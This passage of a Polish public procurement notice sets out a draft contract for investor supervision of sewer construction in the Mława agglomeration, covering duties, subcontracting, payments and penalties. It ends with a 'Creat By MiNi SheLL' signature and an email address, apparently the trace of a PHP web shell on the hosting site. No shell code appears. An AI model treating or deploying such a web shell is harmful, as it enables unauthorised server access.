nr POIS.02.03.00-00-0034/16-00 Projektu Budowa kanalizacji sanitarnej na terenie Aglomeracji Mława nr POIS.02.03.00-00-0034/16 w ramach działania 2.3 Gospodarka wodno  ściekowa w aglomeracjach II oś priorytetowa Ochrona środowiska, w tym adaptacja do zmian klimatu Programu Operacyjnego Infrastruktura i Środowisko 2014-2020.
3.	Wykonawca jest zobowiązany do pełnienia nadzoru inwestorskiego nad budową kanalizacji sanitarnej w 8 obszarach Aglomeracji Mława, oznaczonych od A1 do A8.
4.	Dla każdego obszaru należy prowadzić odrębną dokumentację i rozliczenia. Wszystkie obowiązki wynikające z postanowień niniejszej umowy należy wykonywać dla każdego obszaru odrębnie.
5.	Wykonawca utworzy zespół nadzoru inwestorskiego składający się z osób posiadających wymagane prawem uprawnienia budowlane. Zamawiający wymaga, aby zespół składał się minimum z 4 osób, z tym, że 2 osoby powinny posiadać uprawnienia w branży sanitarnej, jedna w branży elektrycznej, jedna w branży archeologicznej. W przypadku wystąpienia konieczności sprawowania nadzoru nad inną branżą (np. drogowa, zabytki) Wykonawca rozszerza zespół o osoby niezbędne do uczestniczenia w procesie budowlanym. 
§2
1.	 Zamawiający powierzy Wykonawcy nadzór nad realizacją zadania w celu skutecznego wyegzekwowania od Wykonawcy wymagań dotyczących jakości stosowanych materiałów i robót, kosztów realizacji robót oraz wykonania obiektu zgodnie 
z dokumentacją projektową, w ustalonym w umowie z Wykonawcą robót terminie.
 2. Obowiązki ogólne.
a) podczas realizacji kontraktu na roboty: -	utrzymywanie na bieżąco łączności i sprawozdawczości między wszystkimi 	uczestnikami procesu i Zamawiającym; -	monitorowanie i kontrola kontraktu na roboty pod względem technicznym,
  finansowym i organizacyjnym, -	informowanie Zamawiającego o wszystkich problemach istniejących 
i przewidywanych razem ze sposobami ich rozwiązywania i/lub działaniami
  korygującymi mającymi na celu usuwanie takich problemów, -	współpraca z Zamawiającym w egzekwowaniu postanowień kontraktu na roboty,  -	nadzór, kontrola i zapobieganie, monitorowanie i składanie sprawozdań oraz zestawień co dwa tygodnie dotyczących fizycznego i finansowego postępu 
i zaawansowania robót, -	wszystkie inne czynności i zadania nie wymienione w niniejszym zakresie zadań,
  które okażą się konieczne dla prawidłowej realizacji kontraktu na roboty (zgodnie
  z wymaganiami Zamawiającego) oraz zabezpieczenie jego interesów.
b)  podczas okresu zgłaszania wad i monitorowania: po skończeniu robót, podczas okresu zgłaszania wad Wykonawca będzie uczestniczył          w nadzorowaniu inspekcji gwarancyjnych, końcowych akceptacji i rozwiązywaniu sporów.  W szczególności, zadania te zawierają: -	regularne inspekcje wad usuwanych przez Wykonawcę; -	wydanie opinii końcowej oraz sprawdzenie końcowego oświadczenia Wykonawcy; -	przygotowanie rozliczenia kontraktu, -	uczestnictwo w rozwiązywaniu sporów zgodnie z warunkami kontraktu.
c) 		Wykonawca zapewni pełny nadzór z ramienia Zamawiającego i dokona następujących czynności:  -	pełny nadzór inwestorski nad robotami, ze szczególnym uwzględnieniem polskiego
 	Prawa Budowlanego i innych odnośnych regulacji prawnych. Każdorazowy pobyt na placu budowy winien być potwierdzony w rejestrze zlokalizowanym w siedzibie Zamawiającego. W przypadku niedostępności rejestru wpis uzupełnia się w następnym możliwym terminie.
     - monitorowanie postępu robót oraz nadzorowanie postępu robót w takich odstępach czasowych, aby zapewniona była skuteczność nadzoru, jednak nie rzadziej niż  wizyt kontrolnych na budowach w tygodniu dla każdego z obszarów na których prowadzone są roboty,
      - podejmowanie decyzji w porozumieniu z Zamawiającym o: dopuszczeniu materiałów, prefabrykatów i wszystkich elementów i urządzeń przewidzianych do wbudowania wykorzystania przy realizacji robót, 
         - wstrzymaniu robót prowadzonych w sposób zagrażający bezpieczeństwu 
lub niezgodnie z wymaganiami zawartej umowy, sposobie zabezpieczenia wykopalisk odkrytych na terenie budowy.   
-  udział    w   komisyjnym   pobieraniu    próbek    do    badań   oraz powiadamiania     Zamawiającego na 3 dni przed o zamiarze ich pobrania, 
         - zlecania Wykonawcy Robót wykonania dodatkowych badań materiałów lub robót budzących wątpliwość, co do ich jakości;
         -  organizowanie, wraz z Zamawiającym, cyklicznych narad koordynacyjnych na  placu      budowy lub w siedzibie Zamawiającego (co najmniej raz na 2 tygodnie) oraz przygotowanie notatek w celu umożliwienia podejmowania decyzji o każdym zagadnieniu, które wpływa na postęp robót,
	-   sporządzanie protokołów ze spotkań i narad,
         - 	przeglądanie i analiza rysunków wykonawczych i dokumentów wykonawczych sporządzanych przez Wykonawcę z komentarzami dla Zamawiającego (jeżeli wystąpi taka potrzeba), jeśli chodzi o zgodność (lub niezgodność) z robotami kontraktowymi, 
         - 	przegląd dokumentacji projektowej przygotowanej przez Zamawiającego,
         - 	przeglądanie rysunków roboczych Wykonawcy zawierających zmiany, zatwierdzanie   robót zamiennych,
         - 	ustalanie i określanie wartości wykonanych robót zgodnie z kontraktem,    
         -	    przeprowadzanie regularnych inspekcji placu budowy sprawdzających jakość
wykonania i materiałów zgodnie z kontraktem oraz dobrą praktyką inżynierską, 
         - 	zatwierdzanie materiałów budowlanych i instalacyjnych, urządzeń oraz dostaw
Wykonawcy, sprawdzanie jakości dokumentów, zezwoleń, deklaracji zgodności, certyfikatów itd., w celu uniknięcia użycia materiałów uszkodzonych lub nie  mających polskich certyfikatów, 
         -	    zatwierdzanie proponowanych metod wykonywania robót budowlanych, włączając  
w to roboty tymczasowe zaproponowane przez Wykonawcę,
	-	rekomendowanie wszystkich zmian w planach i specyfikacjach, które mogą okazać się niezbędne lub pożądane podczas lub w następstwie wykonywania robót budowlanych, 
         -	    sprawdzenie dokumentacji powykonawczej i dostarczenie jej do zamawiającego wraz 
z dokumentacją dotyczącą nadzorowanych robót (włączając w to inwentaryzację geodezyjną w postaci map) w formie uzgodnionej z zamawiającym,
         - 	przeprowadzenie inspekcji końcowej, sporządzenie protokołu odbioru, listy usterek 
i innych dokumentów związanych z warunkami kontraktu,
         - skompletowanie dokumentacji Wykonawcy i oświadczeń wymaganych przez
odpowiednie uregulowania oraz współpraca z Zamawiającym w otrzymaniu pozwoleń użytkowania (w przypadku takiej konieczności),
         -	   ścisła współpraca z nadzorem autorskim, 
         -	   ocenianie i rozstrzyganie wszelkich roszczeń lub dyskusji kontraktowych i problemów narastających podczas robót, zapobieganie sporom i opóźnieniom, gdy jest 
to wykonalne, 
         -	 zapewnienie, że roboty są wykonywane zgodnie z odpowiednimi wymaganiami bezpieczeństwa i ochrony zdrowia,
         -	 dostarczanie pełnej i wiarygodnej informacji personelowi Zamawiającego.
	- wykonanie i przedstawianie Zamawiającemu sprawozdań oraz zestawień rzeczowo - kosztorysowych z wykonanych robót w odstępach co 2 tygodnie z podziałem na ulice. Zestawienia powinny obejmować okres bieżący i narastająco wskazywać ilość wykonanych robót z danej pozycji kosztorysowej.
3. Wykonawca ponosi pełną odpowiedzialność za właściwe i terminowe wykonanie całego przedmiotu umowy, w tym także odpowiedzialność za jakość, terminowość oraz bezpieczeństwo usług wykonywanych przez podwykonawców.
4. W przypadku gdyby Wykonawca zamierzał zatrudnić do realizacji przedmiotu umowy Podwykonawców (na rachunek i ryzyko Wykonawcy), powinien powiadomić o tym fakcie Zamawiającego w zakresie określonym w art. 36b ustawy Pzp oraz przedstawić Zamawiającemu przed przystąpieniem podwykonawców do realizacji usługi, do akceptacji w formie pisemnej projektów umów, których postanowienia nie mogą być sprzeczne z postanowieniami niniejszej umowy oraz zestawienie kosztowe zatrudnionych podwykonawców. Zastrzega się, że suma kosztów przeznaczonych dla podwykonawcy nie może przekraczać kwoty przeznaczonej na realizacje danego elementu, który ten element realizuje.
5. Zamawiający w terminie 14 dni roboczych od przekazania w formie pisemnej projektów umów z podwykonawcami dokona akceptacji umów lub zgłosi sprzeciw, lub zastrzeżenia do ich treści. Wykonawca zobowiązany jest do przedstawienia Zamawiającemu umów z naniesionymi poprawkami w ciągu 2 dni roboczych do akceptacji. Nie przedstawienie Zamawiającemu umów uwzględniających uwagi Zamawiającego poczytuje się za przyjęcie przez Wykonawcę zgłoszonego przez Zamawiającego sprzeciwu lub zastrzeżeń. 
6. Wykonawca przedkłada Zamawiającemu w terminie do 7 dni od dnia zawarcia umowy o podwykonawstwo kopię umowy, poświadczoną za zgodność z oryginałem.
7. Zamawiający w terminie 14 dni roboczych od pisemnego przekazania - przedstawienia mu kopii umów z podwykonawcami, dokona akceptacji umów lub zgłosi sprzeciw, lub zastrzeżenia do ich treści. Wykonawca zobowiązany jest do przedstawienia Zamawiającemu zmian w ciągu 2 dni roboczych do akceptacji. Nie przedstawienie Zamawiającemu umów uwzględniających uwagi Zamawiającego poczytuje się za przyjęcie przez Wykonawcę zgłoszonego przez Zamawiającego sprzeciwu lub zastrzeżeń.
8. Wykonawca, wraz ze złożeniem projektu umowy o podwykonawstwo, przedkłada zamawiającemu zestawienie kosztowe realizacji zamówienia zawierające zbiorczą informacje o wynagrodzeniach dla podwykonawców i wykonawcy.
9. Wykonawca, w terminie do 14 dni od podpisania umowy dostarczy zamawiającemu dokumenty osobowe umożliwiające zgłoszenie zamiaru rozpoczęcia budowy w nadzorze budowlanym (w szczególności: oświadczenia inspektora nadzoru (wiodącego), dokument poświadczający przynależność do Izby Inżynierów Budownictwa, dokument potwierdzający posiadanie uprawnień budowlanych)

§ 3
1.	Termin wykonania zamówienia: Od dnia podpisania umowy do momentu zakończenia
i rozliczenia inwestycji będącej przedmiotem nadzoru. Zakończenie robót budowlanych
przewiduje się na: 31.12.2018 r.
2.	Wykonawca zobowiązuje się świadczyć usługi do czasu faktycznego zakończenia robót oraz rozliczenia końcowego inwestycji, a także w okresie rękojmi i gwarancji.
3.	Czas, o którym mowa w ust. 1 może zostać na wniosek Zamawiającego wydłużony                    lub skrócony stosownie do rzeczywistego czasu wykonania robót, nad którymi sprawowany będzie nadzór. Nie podlega to dodatkowemu wynagrodzeniu.
4.	Wykonawca będzie miał prawo i obowiązek pełnić swą funkcję w systemie ciągłym 
w dzień i w nocy oraz dniach wolnych od pracy. Nie podlega to dodatkowemu wynagrodzeniu.
§ 4
1. Zamawiający zobowiązuje się do:
	a) 	zabezpieczenia środków finansowych niezbędnych do prawidłowego i terminowego
regulowania należności za wykonywane usługi nadzoru,
b) 	przekazania Wykonawcy aktualnej i kompletnej dokumentacji technicznej, pozwoleń na budowę, kopii kosztorysów wykonawców oraz umów z wykonawcami.
2. Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.  Kodeks pracy.
1)	W trakcie realizacji zamówienia zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec wykonawcy odnośnie spełniania przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób. Zamawiający uprawniony jest w szczególności do: 
a)	żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania 
ww. wymogów i dokonywania ich oceny,
b)	żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów,
c)	przeprowadzania kontroli na miejscu wykonywania świadczenia.
2)	W trakcie realizacji zamówienia na każde wezwanie zamawiającego w wyznaczonym 
w tym wezwaniu terminie wykonawca przedłoży zamawiającemu wskazane poniżej dowody w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia:
	oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności, których dotyczy wezwanie zamawiającego. Oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, rodzaju umowy 
o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia 
w imieniu wykonawcy lub podwykonawcy;
	poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię umowy/umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności, których dotyczy ww. oświadczenie wykonawcy lub podwykonawcy (wraz z dokumentem regulującym zakres obowiązków, jeżeli został sporządzony). Kopia umowy/umów powinna zostać zanonimizowana 
w sposób zapewniający ochronę danych osobowych pracowników, zgodnie 
z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych 
(tj. w szczególności  bez imion, nazwisk, adresów, nr PESEL pracowników). Informacje takie jak: data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być możliwe do zidentyfikowania;
	zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez wykonawcę lub podwykonawcę składek na ubezpieczenia społeczne i zdrowotne 
z tytułu zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy;
	poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń, zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych.
3)	Z tytułu niespełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia 
na podstawie umowy o pracę osób wykonujących wskazane w punkcie 1 czynności zamawiający przewiduje sankcję w postaci określonej w pkt. 4. Niezłożenie przez wykonawcę w wyznaczonym przez zamawiającego terminie żądanych przez zamawiającego dowodów w celu potwierdzenia spełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę traktowane będzie jako niespełnienie przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 1 czynności. 
4)	W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez wykonawcę lub podwykonawcę, zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy.

§ 5
1. Za wykonanie zakresu umownego prac ustala się wynagrodzenie Wykonawcy w formie ryczałtu:
a) za pełnienie nadzoru inwestorskiego nad budową kanalizacji sanitarnej na terenie  Aglomeracji Mława Obszar A1:
w kwocie netto . zł,
powiększonej o podatek VAT (.%) w wysokości: . zł 
co stanowi łącznie kwotę brutto:  zł,
słownie:  i ./100.
b) za pełnienie nadzoru inwestorskiego nad budową kanalizacji sanitarnej na terenie Aglomeracji Mława Obszar A2:
w kwocie netto . zł,
powiększonej o podatek VAT (.%) w wysokości: . zł 
co stanowi łącznie kwotę brutto:  zł,
słownie:  i ./100.
c) za pełnienie nadzoru inwestorskiego nad budową kanalizacji sanitarnej na terenie Aglomeracji Mława Obszar A3:
w kwocie netto . zł,
powiększonej o podatek VAT (.%) w wysokości: . zł 
co stanowi łącznie kwotę brutto:  zł,
słownie:  i ./100.
d) za pełnienie nadzoru inwestorskiego nad budową kanalizacji sanitarnej na terenie Aglomeracji Mława Obszar A4:
w kwocie netto . zł,
powiększonej o podatek VAT (.%) w wysokości: . zł 
co stanowi łącznie kwotę brutto:  zł,
słownie:  i ./100.
e) za pełnienie nadzoru inwestorskiego nad budową kanalizacji sanitarnej na terenie Aglomeracji Mława Obszar A5:
w kwocie netto . zł,
powiększonej o podatek VAT (.%) w wysokości: . zł 
co stanowi łącznie kwotę brutto:  zł,
słownie:  i ./100.
f) za pełnienie nadzoru inwestorskiego nad budową kanalizacji sanitarnej na terenie Aglomeracji Mława Obszar A6:
w kwocie netto . zł,
powiększonej o podatek VAT (.%) w wysokości: . zł 
co stanowi łącznie kwotę brutto:  zł,
słownie:  i ./100.
g) za pełnienie nadzoru inwestorskiego nad budową kanalizacji sanitarnej na terenie Aglomeracji Mława Obszar A7:
w kwocie netto . zł,
powiększonej o podatek VAT (.%) w wysokości: . zł 
co stanowi łącznie kwotę brutto:  zł,
słownie:  i ./100.
h) za pełnienie nadzoru inwestorskiego nad budową kanalizacji sanitarnej na terenie Aglomeracji Mława Obszar A8:
w kwocie netto . zł,
powiększonej o podatek VAT (.%) w wysokości: . zł 
co stanowi łącznie kwotę brutto:  zł,
słownie:  i ./100.
i)	Razem brutto: 
słownie:  i ./100.
2.	Rozliczenie wynagrodzenia Wykonawcy za przedmiot umowy odbywać się będzie po podpisaniu protokołu częściowego lub końcowego odbioru robót Wykonawcy robót budowlanych oraz protokołu częściowego lub końcowego odbioru pełnienia usługi nadzoru inwestorskiego.
3.	Wysokość rozliczenia usługi nadzoru inwestorskiego odbywać się będzie proporcjonalnie do wysokości rozliczenia wykonanych robót budowlanych w odniesieniu procentowym. 
4.	Zapłata za wystawione faktury następować będzie w terminie 30 dni kalendarzowych licząc od dnia ich dostarczenia do siedziby Zamawiającego.
5.	Wszelkie dokumenty muszą być przygotowane co najmniej w 2 egz. dla zamawiającego. 
6.	Zamawiający dopuszcza możliwość cesji wierzytelności na podwykonawcę. Każda 
z przedmiotowych cesji rozpatrywana będzie odrębnie.
7.	W przypadku wykonania robót budowlanych będących przedmiotem umowy przez Podwykonawców, zapłata należności za wykonane roboty będzie następująca:
1)	Wykonawca składając fakturę za usługi, która ujmuje również zakres wykonywany przez Podwykonawcę, dokona stosownego podziału należności pomiędzy Wykonawcę i Podwykonawcę w protokole stanu podpisanym przez Inspektora Nadzoru, Zamawiającego i Podwykonawcę,
2)	Wykonawca, wraz ze złożoną fakturą przedłoży w siedzibie Zamawiającego kserokopię przelewu dokonanego na konto Podwykonawcy za wykonany zakres oraz oświadczenia podwykonawcy o dokonaniu rozliczenia z wykonawcą za wykonany zakres,
3)	Termin dokonania zapłaty podwykonawcy ustala się na 21 dni od dnia odbioru usługi,
4)	Wszelkie zasady zawierania umów o podwykonawstwo, określone w umowie, dotyczą tożsamo zawierania umów z dalszymi podwykonawcami. 

§ 6
1.	 Przedstawicielem Zamawiającego w sprawach związanych z realizacją umowy jest: 
Anna Miałka-Kruszewska  Kierownik Jednostki Realizującej Projekt
Krzysztof Dubojski  Główny specjalista ds. technicznych, Jednostka Realizująca Projekt
Inne osoby umocowane odpowiednimi dokumentami.
2.   Przedstawicielem Wykonawcy w sprawach związanych z realizacją umowy jest:
-	..
3.	W skład zespołu Inspektora Nadzoru wchodzą:
-	   -  inspektor nadzoru w specjalności sanitarnej (wiodący),
-	   -  inspektor nadzoru w specjalności sanitarnej,
-    . -  inspektor nadzoru w specjalności elektroenergetycznej,
-	   -  inspektor nadzoru w specjalności archeologicznej.

§ 7
Odstąpienie od umowy
1.	Zamawiający może odstąpić od umowy bez wyznaczenia dodatkowego terminu, jeżeli Wykonawca opóźnia się z podjęciem obowiązków nadzoru określonych w §2 umowy                  i ich wykonywaniem,  a w szczególności:
1)	nie przystąpił do sprawowania obowiązków nadzoru w terminie 30 dni od daty zawarcia umowy, 
2)	zaniechał sprawowania obowiązków nadzoru nieprzerwanie przez okres 14 dni.
2.	Zamawiający może odstąpić od umowy, o ile Wykonawca wykonuje obowiązki nadzoru nierzetelnie lub w sposób sprzeczny z umową, a w szczególności niezgodnie z dokonanymi uzgodnieniami. Wówczas Zamawiający zapłaci wynagrodzenie                          za pełnienie nadzoru nad wykonanym zakresem robót proporcjonalnie do ich udziału   w całości zadania.
3.	Ustalenie wartości, o której mowa w ust. 2 następuje w obecności Wykonawcy, chyba że Wykonawca nie stawi się w terminie określonym przez Zamawiającego, wówczas Zamawiający dokona oszacowania wykonania części umowy jednostronnie na ryzyko Wykonawcy.
§ 8
Kary umowne
1.	Wykonawca zapłaci Zamawiającemu kary umowne w następujących przypadkach:
1)	za odstąpienie od umowy przez Zamawiającego z przyczyn, o których mowa w § 7 ust.1, 2 w wysokości 20% całkowitego wynagrodzenia brutto określonego w  § 5 ust 1 lit i),  
2)	za odstąpienie od umowy przez Wykonawcę w wysokości 20% całkowitego wynagrodzenia brutto określonego w § 5 ust 1 lit i),  
3)	za przerwę w realizacji obowiązków nadzoru trwającą dłużej niż 7 dni spowodowaną przyczyną zależną od Wykonawcy w wysokości 0,1 % całości wynagrodzenia brutto za każdy rozpoczęty dzień przerwy powyżej 7 dni.
4)	za brak zapłaty lub nieterminową zapłatę wynagrodzenia należnego podwykonawcom lub dalszym podwykonawcom w wysokości 1% całości wynagrodzenia brutto za każdy dzień opóźnienia względem danego podwykonawcy,
5)	za nieprzedłożenie do zaakceptowania projektu umowy o podwykonawstwo lub projektu jej zmiany w wysokości 10% całości wynagrodzenia brutto dotyczącego danego podwykonawcy,
6)	za nieprzedłożenie poświadczonej za zgodność z oryginałem kopii umowy o podwykonawstwo lub jej zmiany w wysokości 10% całości wynagrodzenia brutto dotyczącej danego podwykonawcy,
7)	za brak zmiany umowy o podwykonawstwo w zakresie terminu zapłaty w wysokości 5% całości wynagrodzenia brutto dotyczącej danego podwykonawcy,
8)	za niedopełnienie obowiązku wynikającej z określonej w formularzu ofertowym ilości  wizyt kontrolnych na budowach w wysokości 1000zł za wystąpienie,
2.	Zamawiający może potrącić kary umowne określone w ust. 1 z bieżącego wynagrodzenia Wykonawcy poprzez potrącenia z wystawianych faktur.
3.	Maksymalna wysokość kar łącznie nie może przekroczyć 100% wynagrodzenia brutto określonego w § 5 ust 1 lit i)
4.	Zamawiający zastrzega sobie prawo dochodzenia odszkodowania uzupełniającego
na zasadach ogólnych określonych w Kodeksie cywilnym.

§ 9
W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie miesiąca od powzięcia wiadomości 
o powyższych okolicznościach. W takim wypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy.

§ 10
1.	Wszystkie zmiany niniejszej umowy wymagają formy pisemnej, pod rygorem nieważności.
2.	Prawa i obowiązki wynikające z niniejszej umowy mogą być przeniesione na rzecz osób trzecich wyłącznie za zgodą Stron.

§ 11
Spory wynikłe na tle wykonywania niniejszej umowy będzie rozstrzygał Sąd właściwy 
dla siedziby Zamawiającego. 


§ 12
W sprawach nieuregulowanych niniejszą umową będą miały zastosowanie przepisy kodeksu cywilnego.
§13
Umowę sporządzono w trzech jednakowo brzmiących egzemplarzach z przeznaczeniem dwóch egzemplarzy dla Zamawiającego i jednego egzemplarza dla Wykonawcy.</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 23/02/2017, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              PL<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com